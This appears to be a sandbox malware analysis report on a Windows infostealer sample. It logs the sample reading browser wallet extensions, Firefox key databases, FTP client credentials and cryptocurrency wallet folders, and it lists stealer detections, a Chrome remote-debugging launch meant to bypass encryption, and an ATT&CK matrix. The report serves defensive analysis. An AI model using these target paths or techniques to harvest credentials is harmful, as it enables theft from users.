Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2089531197.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2108324381.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2089531197.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2089889800.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2104038300.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2089889800.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SQ1NgqeTQy.exe PID: 4088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1788, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: SQ1NgqeTQy.exe PID: 4088, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000003.00000003.2205394857.0000000005640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2262935516.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2258579469.0000000000E61000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe PID: 5008, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected StormKitty Stealer

Source: Yara match	File source: 0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1788, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected XWorm

Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1788, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	131 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Windows Service	111 Deobfuscate/Decode Files or Information	1 Input Capture	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Windows Service	312 Process Injection	141 Obfuscated Files or Information	Security Account Manager	256 System Information Discovery	SMB/Windows Admin Shares	1 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	31 Scheduled Task/Job	31 Scheduled Task/Job	31 Scheduled Task/Job	32 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	1 Clipboard Data	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1181 Security Software Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	3 Process Discovery	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Masquerading	DCSync	481 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	481 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	2 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	312 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SQ1NgqeTQy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Xworm

Threatname: Amadey

Threatname: AsyncRAT

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SQ1NgqeTQy.exe